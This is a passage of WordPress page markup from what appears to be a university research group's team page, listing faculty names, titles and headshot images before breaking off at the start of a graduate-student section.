align-self-start\">\n<div class=\"d-block style-513 style-local-182-c5 position-relative h-element\" data-colibri-id=\"182-c5\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-706 style-513-image style-local-182-c5-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-headshot.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c5-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c6 position-relative\" data-colibri-id=\"182-c6\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c7-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c7 position-relative\" data-colibri-id=\"182-c7\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c8 position-relative h-element\" data-colibri-id=\"182-c8\">\n<div class=\"h-heading__outer style-516 style-local-182-c8\">\n<h4 class=\"\">Chetan Tiwari</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c9 position-relative h-element\" data-colibri-id=\"182-c9\">\n<div class=\"\">\n\nDirector\n\n</div>\n</div>\n<div class=\"style-518 style-local-182-c10 position-relative h-element\" data-colibri-id=\"182-c10\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c11-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c11 position-relative\" data-colibri-id=\"182-c11\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c12 position-relative h-element\" data-colibri-id=\"182-c12\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-708 style-513-image style-local-182-c12-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Armin-Mikler_300x300-1.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c12-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c13 position-relative\" data-colibri-id=\"182-c13\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c14-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c14 position-relative\" data-colibri-id=\"182-c14\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c15 position-relative h-element\" data-colibri-id=\"182-c15\">\n<div class=\"h-heading__outer style-516 style-local-182-c15\">\n<h4 class=\"\">Armin Mikler</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c16 position-relative h-element\" data-colibri-id=\"182-c16\">\n<div class=\"\">\n\nProfessor\n\n</div>\n</div>\n<div class=\"style-520 style-local-182-c17 position-relative h-element\" data-colibri-id=\"182-c17\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c18-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c18 position-relative\" data-colibri-id=\"182-c18\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c19 position-relative h-element\" data-colibri-id=\"182-c19\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-710 style-513-image style-local-182-c19-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-sunderraman1.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c19-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c20 position-relative\" data-colibri-id=\"182-c20\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c21-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c21 position-relative\" data-colibri-id=\"182-c21\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c22 position-relative h-element\" data-colibri-id=\"182-c22\">\n<div class=\"h-heading__outer style-516 style-local-182-c22\">\n<h4 class=\"\">Raj Sunderraman</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c23 position-relative h-element\" data-colibri-id=\"182-c23\">\n<div class=\"\">\n\nProfessor\n\n</div>\n</div>\n<div class=\"style-518 style-local-182-c24 position-relative h-element\" data-colibri-id=\"182-c24\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c25-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c25 position-relative\" data-colibri-id=\"182-c25\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c26 position-relative h-element\" data-colibri-id=\"182-c26\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-707 style-513-image style-local-182-c26-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1.png\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c26-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c27 position-relative\" data-colibri-id=\"182-c27\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c28-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c28 position-relative\" data-colibri-id=\"182-c28\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c29 position-relative h-element\" data-colibri-id=\"182-c29\">\n<div class=\"h-heading__outer style-516 style-local-182-c29\">\n<h4 class=\"\">Susie Ramisetty-Mikler</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c30 position-relative h-element\" data-colibri-id=\"182-c30\">\n<div class=\"\">\n\nResearch Associate Professor\n\n</div>\n</div>\n<div class=\"style-519 style-local-182-c31 position-relative h-element\" data-colibri-id=\"182-c31\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c32-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c32 position-relative\" data-colibri-id=\"182-c32\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c33 position-relative h-element\" data-colibri-id=\"182-c33\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-709 style-513-image style-local-182-c33-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-bourgeois-1.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c33-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c34 position-relative\" data-colibri-id=\"182-c34\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c35-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c35 position-relative\" data-colibri-id=\"182-c35\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c36 position-relative h-element\" data-colibri-id=\"182-c36\">\n<div class=\"h-heading__outer style-516 style-local-182-c36\">\n<h4 class=\"\">Anu Bourgeois</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c37 position-relative h-element\" data-colibri-id=\"182-c37\">\n<div class=\"\">\n\nAssociate Professor\n\n</div>\n</div>\n<div class=\"style-521 style-local-182-c38 position-relative h-element\" data-colibri-id=\"182-c38\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c39-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c39 position-relative\" data-colibri-id=\"182-c39\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c40 position-relative h-element\" data-colibri-id=\"182-c40\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-711 style-513-image style-local-182-c40-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-skums.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c40-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c41 position-relative\" data-colibri-id=\"182-c41\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c42-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c42 position-relative\" data-colibri-id=\"182-c42\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c43 position-relative h-element\" data-colibri-id=\"182-c43\">\n<div class=\"h-heading__outer style-516 style-local-182-c43\">\n<h4 class=\"\">Pavel Skums</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c44 position-relative h-element\" data-colibri-id=\"182-c44\">\n<div class=\"\">\n\nAssistant Professor\n\n</div>\n</div>\n<div class=\"style-518 style-local-182-c45 position-relative h-element\" data-colibri-id=\"182-c45\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c46-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c46 position-relative\" data-colibri-id=\"182-c46\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c47 position-relative h-element\" data-colibri-id=\"182-c47\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-712 style-513-image style-local-182-c47-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky-1.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c47-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c48 position-relative\" data-colibri-id=\"182-c48\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c49-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c49 position-relative\" data-colibri-id=\"182-c49\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c50 position-relative h-element\" data-colibri-id=\"182-c50\">\n<div class=\"h-heading__outer style-516 style-local-182-c50\">\n<h4 class=\"\">Alex Zelikovsky</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c51 position-relative h-element\" data-colibri-id=\"182-c51\">\n<div class=\"\">\n\nDistinguished University Professor\n\n</div>\n</div>\n<div class=\"style-518 style-local-182-c52 position-relative h-element\" data-colibri-id=\"182-c52\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c53-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c53 position-relative\" data-colibri-id=\"182-c53\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c54 position-relative h-element\" data-colibri-id=\"182-c54\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1348 style-513-image style-local-182-c54-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c54-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c55 position-relative\" data-colibri-id=\"182-c55\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c56-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c56 position-relative\" data-colibri-id=\"182-c56\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c57 position-relative h-element\" data-colibri-id=\"182-c57\">\n<div class=\"h-heading__outer style-516 style-local-182-c57\">\n<h4 class=\"\">Xiaolin Hu</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c58 position-relative h-element\" data-colibri-id=\"182-c58\">\n<div class=\"\">\n\nProfessor\n\n</div>\n</div>\n<div class=\"style-518 style-local-182-c59 position-relative h-element\" data-colibri-id=\"182-c59\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c60-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c60 position-relative\" data-colibri-id=\"182-c60\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c61 position-relative h-element\" data-colibri-id=\"182-c61\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-713 style-513-image style-local-182-c61-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Taylor-shelton_300x300.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c61-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c62 position-relative\" data-colibri-id=\"182-c62\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c63-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c63 position-relative\" data-colibri-id=\"182-c63\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c64 position-relative h-element\" data-colibri-id=\"182-c64\">\n<div class=\"h-heading__outer style-516 style-local-182-c64\">\n<h4 class=\"\">Taylor Shelton</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c65 position-relative h-element\" data-colibri-id=\"182-c65\">\n<div class=\"\">\n\n<span style=\"color: #4055a9; font-family: \'Open Sans\'; font-size: 16px; font-weight: 400;\">Assistant Professor</span>\n\n</div>\n</div>\n<div class=\"style-518 style-local-182-c66 position-relative h-element\" data-colibri-id=\"182-c66\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div id=\"team-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-605 style-local-182-c70 position-relative\" data-colibri-component=\"section\" data-colibri-id=\"182-c70\">\n<div class=\"h-section-grid-container h-section-boxed-container\">\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-617 style-local-182-c169 position-relative\" data-colibri-id=\"182-c169\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-618-outer style-local-182-c170-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-618 style-local-182-c170 position-relative\" data-colibri-id=\"182-c170\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-619 style-local-182-c171 position-relative h-element\" data-colibri-id=\"182-c171\">\n<div class=\"h-heading__outer style-619 style-local-182-c171\">\n<h2 class=\"\">Graduate Students</h2>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-606 style-local-182-c71 position-relative\" data-colibri-id=\"182-c71\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c72-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c72 position-relative\" data-colibri-id=\"182-c72\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c73 position-relative h-element\" data-colibri-id=\"182-c73\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-784 style-608-image style-local-182-c73-image\" 